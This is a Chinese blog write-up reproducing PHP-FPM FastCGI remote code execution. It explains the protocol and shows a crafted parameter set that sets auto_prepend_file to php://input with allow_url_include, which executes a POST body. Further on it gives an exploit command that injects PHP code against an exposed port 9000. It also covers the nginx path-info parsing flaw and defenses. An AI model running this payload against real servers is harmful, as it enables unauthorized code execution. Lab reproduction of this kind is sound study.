php-FPM 基于fastcgi协议的rce漏洞复现 CVE-2019-11043

最新推荐文章于 2023-02-10 22:49:00 发布
最新推荐文章于 2023-02-10 22:49:00 发布
阅读量4.5k 收藏 4
点赞数 1
分类专栏: php web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/121325451
版权

文章目录

1. 基础知识

1.1 fastcgi是什么

是一个协议,类似于http协议。fastcgi是一种web服务器与某种语言进行数据交换的规则,而http协议是浏览器与web容器进行数据交换的规则。

1.2 PHP-FPM是什么

PHP-FPM就是一个实现了fastcgi协议的实体程序,全名是Fast-cij process manager,可以利用PHP-FPM可以接收web容器发过来的符合fastcgi协议格式的数据,然后执行相应的php文件,然后将执行结果返回web容器,web容器返回给客户端。

举个例子,用户访问http://127.0.0.1/index.php?a=1&b=2,如果web目录是/var/www/html,那么Nginx会将这个请求变成如下key-value对:

{
    'GATEWAY_INTERFACE': 'FastCGI/1.0',
    'REQUEST_METHOD': 'GET',
    'SCRIPT_FILENAME': '/var/www/html/index.php',
    'SCRIPT_NAME': '/index.php',
    'QUERY_STRING': '?a=1&b=2',
    'REQUEST_URI': '/index.php?a=1&b=2',
    'DOCUMENT_ROOT': '/var/www/html',
    'SERVER_SOFTWARE': 'php/fcgiclient',
    'REMOTE_ADDR': '127.0.0.1',
    'REMOTE_PORT': '12345',
    'SERVER_ADDR': '127.0.0.1',
    'SERVER_PORT': '80',
    'SERVER_NAME': "localhost",
    'SERVER_PROTOCOL': 'HTTP/1.1'
}

这个数组其实就是PHP中$_SERVER数组的一部分,也就是PHP里的环境变量,也可以理解成php.ini文件中的部分配置,通过这个请求包而执行的php文件所使用的具体配置以请求包中定义的配置为准。

例如,假如我们可以控制这个请求包中的内容,我们可以在请求包中加上'PHP_ADMIN_VALUE': 'allow_url_include = On',那么此次请求的文件中就可以使用远程文件包含。不过disable_functions不能被配置。

PHP-FPM拿到fastcgi的数据包后,进行解析,得到上述这些环境变量。然后,执行SCRIPT_FILENAME的值指向的PHP文件,也就是/var/www/html/index.php,这个php文件必须在服务器内才行。

PHP-FPM默认监听9000端口,如果这个端口可以被我们直接访问到,则我们可以自己构造fastcgi协议,和fpm进行通信。

1.3 漏洞利用原理

利用条件:

  1. 知道某个php文件在服务器上的绝对路径
  2. 可以访问PHP-FPM的9000端口

在我们可以访问到PHP-FPM的9000端口的时候我们就可以构造恶意的fastcgi格式的数据与PHP-FPM进行通信并进行rce。

数据举例如下:

{
    'GATEWAY_INTERFACE': 'FastCGI/1.0',
    'REQUEST_METHOD': 'GET',
    'SCRIPT_FILENAME': '/var/www/html/index.php',
    'SCRIPT_NAME': '/index.php',
    'QUERY_STRING': '?a=1&b=2',
    'REQUEST_URI': '/index.php?a=1&b=2',
    'DOCUMENT_ROOT': '/var/www/html',
    'SERVER_SOFTWARE': 'php/fcgiclient',
    'REMOTE_ADDR': '127.0.0.1',
    'REMOTE_PORT': '12345',
    'SERVER_ADDR': '127.0.0.1',
    'SERVER_PORT': '80',
    'SERVER_NAME': "localhost",
    'SERVER_PROTOCOL': 'HTTP/1.1'
    'PHP_VALUE': 'auto_prepend_file = php://input',
    'PHP_ADMIN_VALUE': 'allow_url_include = On'
}

这个请求是访问index.php,且它在服务器上的绝对路径是/var/www/html/index.php,必须知道某个文件的绝对路径才能进行漏洞利用。

auto_prepend_file是告诉PHP,在执行目标文件之前,先包含auto_prepend_file中指定的文件;auto_append_file是告诉PHP,在执行完成目标文件后,包含auto_append_file指向的文件。

那么就有趣了,假设我们设置auto_prepend_file为php://input,然后通过添加’PHP_ADMIN_VALUE’: 'allow_url_include = On’在fastcgi数据中来开启开启allow_url_include。此时,index.php在加载前会先加载我们放在post请求Body中的代码,从而达到rce。

下面是php安装后默认含有的php文件:
在这里插入图片描述

漏洞利用结果:

在这里插入图片描述

补充:Nginx(IIS7)文件解析漏洞产生原因

Nginx和IIS7曾经出现过一个PHP相关的解析漏洞(测试环境https://github.com/phith0n/vulhub/tree/master/nginx_parsing_vulnerability),该漏洞现象是,在用户访问http://127.0.0.1/favicon.ico/.php时,访问到的文件是favicon.ico,但却按照.php后缀解析了。

用户请求http://127.0.0.1/favicon.ico/.php,nginx将会发送如下环境变量到fpm里:

{
    ...
    'SCRIPT_FILENAME': '/var/www/html/favicon.ico/.php',
    'SCRIPT_NAME': '/favicon.ico/.php',
    'REQUEST_URI': '/favicon.ico/.php',
    'DOCUMENT_ROOT': '/var/www/html',
    ...
}

正常来说,SCRIPT_FILENAME的值是一个不存在的文件/var/www/html/favicon.ico/.php,是PHP设置中的一个选项fix_pathinfo导致了这个漏洞。PHP为了支持Path Info模式而创造了fix_pathinfo,在这个选项被打开的情况下,fpm会判断SCRIPT_FILENAME是否存在,如果不存在则去掉最后一个/及以后的所有内容,再次判断文件是否存在,往次循环,直到文件存在。

所以,第一次fpm发现/var/www/html/favicon.ico/.php不存在,则去掉/.php,再判断/var/www/html/favicon.ico是否存在。显然这个文件是存在的,于是被作为PHP文件执行,导致解析漏洞。

防御方案

1.在Nginx端使用fastcgi_split_path_info将path info信息去除后,用tryfiles判断文件是否存在;
2.借助PHP-FPM的security.limit_extensions配置项,避免其他后缀文件被解析。

2. 漏洞利用

在msf中search fpm:

在这里插入图片描述

填入各种参数:

在这里插入图片描述

执行run进行利用:

在这里插入图片描述

对直接暴露的9000端口进行攻击:

exp下载地址

python3 fpm_exp.py 192.168.171.138/usr/local/lib/php/PEAR.php -c "<?php echo `ls`?>"

在这里插入图片描述

参考文章

PHP-FPM Fastcgi 未授权访问漏洞
PHP-FPM Fastcgi 未授权访问漏洞
Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写

Shanfenglan7
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP-FPM Fastcgi 未授权访问漏洞复现
锋刃科技的博客
03-05 897
简介 PHP-FPM是一个fastcgi协议解析器,Nginx等服务器中间件将用户请求按照fastcgi的规则打包好传给FPM。FPM按照fastcgi协议将TCP流解析成真正的数据。PHP-FPM默认监听9000端口,如果这个端口暴露在公网,则我们可以自己构造fastcgi协议,和fpm进行通信。 环境搭建 这里使用docker进行搭建 https://github.com/vulhub/vulhub 进入目录并启动 cd vulhub-master/php/fpm/ ...
CVE-2019-11043:php-fpm + Nginx RCE
03-08
CVE-2019-11043 php-fpm + Nginx RCE0x01安装phuip-fpizdam-Mac go get github.com/neex/phuip-fpizdam go install github.com/neex/phuip-fpizdam ale@Pentest ~/go go get github....fpizdamale@Pentest ~/go lsbin ...
在PHP中使用FastCGI解析漏洞及修复方案
01-20
漏洞描述: Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问http://huoche.7234.cn/images/jb51/jxpmrseidpt.jpg/1.php这个URL时,$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI。如果PHP中开启了fix_pathinfo这个选项,PHP会认为SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就会将phpinf
php-fpm rce攻击
蚁景网安学院
09-27 1930
0x00 somethingPHP-FPM(FastCGI Process Manager):FastCGI进程管理器FastCGIFastCGI 本身是一个协议,是服务器中间件和某个语...
PHP-FPM RCE(CVE-2019-11043)
Darklord.W
10-13 417
漏洞简介 漏洞描述 Nginx + php-fpm部分配置下存在的远程代码执行高危漏洞,攻击者可利用该漏洞对目标网站进行远程代码执行攻击 影响范围 漏洞影响的版本: PHP 5.6-7.x,Nginx>=0.7.31 漏洞原理 Nginx与 php-fpm 服务器上存在远程代码执行漏洞,由于Nginx的fastcgi_split_path_info模块在处理带%0a的请求时,对换行符 \n 处置不当使得将 PATH_INFO 值置为空,从而导致 php-fpm 在处理 P.
漏洞复现PHP-FPM 远程代码执行漏洞CVE-2019-11043
Hi~ 土拨鼠
12-26 452
文章目录一、漏洞简介二、漏洞环境准备三、漏洞复现 一、漏洞简介 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送换行符%0a 时,服务器返回异常。该漏洞需要在nginx.conf 中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.p
PHP-FPM Fastcgi 未授权访问漏洞
weixin_30519071的博客
01-10 625
漏洞原理 Fastcgi Fastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。类比HTTP协议来说,fastcgi协议则是服务器中...
fastcgi未授权访问漏洞(php-fpm fast-cgi未授权访问漏洞)
好好睡觉
02-10 3223
fastcgi未授权访问漏洞
PHP FastCGI RCE Vul
weixin_34216107的博客
06-08 100
catalog 1. Introduction 2. nginx文件类型错误解析漏洞 3. 针对直接公网开放的Fast-CGI攻击 4. 通过FCGI API动态修改php.ini中的配置实现RCE   1. Introduction 我们首先来梳理一下CGI的相关概念 1. CGI CGI是为了保证web server传递过来的数据是标准格式的,从本质上来说,它是一...
----已搬运------浅入深出 Fastcgi 协议分析与 PHP-FPM 攻击方法--------学习子自大佬的教程 ftp那里没做完
Zero_Adam的博客
06-12 6633
目录:0. 前面的一些基础知识,从中摘抄的一些。1.利用 fcgi_exp.go 攻击使用条件:2. 本地实验:2.利用 phith0n 大神的 fpm.py3.SSRF 中对 FPM/FastCGI 的攻击使用条件:2. 本地实验:4. FTP - SSRF 攻击 FPM/FastCGI 学习自:WHOAMI大佬的。 过程中有报错,也能够解决了。很棒很棒的教程。!!! 0. 前面的一些基础知识,从中摘抄的一些。 Fastcgi是一个通信协议,和HTTP协议一样,进行数据交换的一个通道。 默认php-fpm
Fastcgi协议PHP-FPM 攻击方法
05-25 729
1、CGI(Common Gateway Interface) 通用网关接口 最早的服务器只能够返回静态资源给浏览器。但这种方式满足不了人们的所有需求,于是出现了动态网站技术,但是Web服务器不能够直接解释执行动态脚本,于是人们为了能够让Web服务器与外部应用程序(CGI程序)互相通信。CGI通用网关接口应运而生。简单地说CGI就像是一种协议,这种协议规定了Web服务器和运行在Web服务器上的应用程序进行交流的方式。 当Web服务器需要解析动态脚本时,Web服务器会Fork一个新的进程来启动CGI成语完
php-fpm:用于安装和运行PHP-FPM的Docker容器
05-16
PHP-FPM Docker映像 ... PHP-FPMFastCGI流程管理器)是PHP的另一种FastCGI实现。 获取图像 sudo docker image pull nanoninja/php-fpm 运行你PHP脚本 运行PHP-FPM映像,从主机装载目录。 sudo do
基于php-fpm的配置详解
12-18
php5.3自带php-fpm/usr/local/php/etc/php-fpm.confpid = run/php-fpm.pidpid设置,默认在安装目录中的var/run/php-fpm.pid,建议开启 error_log = log/php-fpm.log错误日志,默认在安装目录中的var/log/php-fpm.log...
bitnami-docker-php-fpm:Bitnami PHP-FPM Docker映像
02-12
PHP-FPMFastCGI流程管理器)是另一种PHP FastCGI实现,具有一些其他功能,可用于各种规模的站点,尤其是繁忙的站点。TL; DR $ docker run -it --name phpfpm -v /path/to/app:/app bitnami/php-fpmDocker撰写$ ...
解决php-fpm.service not found问题的办法
01-21
本文给大家详细介绍了解决php-fpm.service not found问题的相关内容,文中介绍的非常详细,下面来一起看看详细的介绍: 环境介绍 环境:ubuntu 16.04 64 php 版本:php-7.1.4 发现问题 正常编译安装 php 按照以前...
远程命令、代码执行RCE漏洞
weixin_43858799的博客
05-13 4278
一、RCE介绍: RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界...
octobercms 执行php代码_新的PHP高危漏洞可导致黑客执行远程代码攻击
weixin_39616961的博客
12-18 98
PHP是构建网络最常见的编程语言。PHP 7作为其全新的分支以打破一切、性能翻倍吸引众多用户。然而其近期被曝存在安全漏洞,可导致服务器被接管。漏洞介绍近日,PHP官方公布了一个高危漏洞,一旦被黑客利用,服务器就会被黑客控制。该漏洞名称是CVE-2019-11043,类型是RCE(远程代码执行),严重级别是高危。PHP官方指出使用NGINX搭载PHP FPM的组合时,在部分配置下,存在漏洞被利用的风...
PHP-FPM远程命令执行(CVE-2019-11043)getshell——漏洞复现
W小哥
12-16 841
一、漏洞原理 漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_INFO 值为空,从而触发该漏洞,通过发送特制的URL请求,在一些特殊的配置情况下会导致任意代码执行。(当nginx配置不当时,会导致php-fpm远程任意代码执行。) 二、环境搭建 使用vulhub搭
CVE-2019-11043 php-fpm和nginx RCE漏洞复现
三天不打上房揭瓦的博客
04-17 613
目录漏洞概述影响版本漏洞复现环境启动代码执行漏洞修复 漏洞概述 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。 影响版本 Nginx + php-fpm 的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。 不可以远程代码执行:PHP 7.0/7.1/7.2/7.3 l
Php-fpm没生成sock,解决PHP-FPM不生成socket文件
最新发布
06-12
如果 PHP-FPM 没有生成 socket 文件,可能有以下几个原因: 1. PHP-FPM 没有启动:请检查 PHP-FPM 是否已经启动,可以通过以下命令来检查: ``` ps aux | grep php-fpm ``` 如果没有输出结果,说明 PHP-FPM 没有启动,请通过以下命令启动 PHP-FPM: ``` sudo service php-fpm start ``` 2. 配置文件错误:请检查 PHP-FPM 的配置文件 `/etc/php-fpm.conf` 或者 `/etc/php-fpm.d/www.conf` 是否正确配置了 socket 文件路径,如下: ``` listen = /var/run/php-fpm/php-fpm.sock ``` 如果配置文件错误,请修改配置文件后重启 PHP-FPM: ``` sudo service php-fpm restart ``` 3. 目录权限不足:请检查 `/var/run/php-fpm` 目录是否有写权限,如果没有,请通过以下命令添加权限: ``` sudo chmod 777 /var/run/php-fpm ``` 然后重启 PHP-FPM: ``` sudo service php-fpm restart ``` 如果以上方法都不能解决问题,请在评论中详细描述问题,我会尽力帮助你解决。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值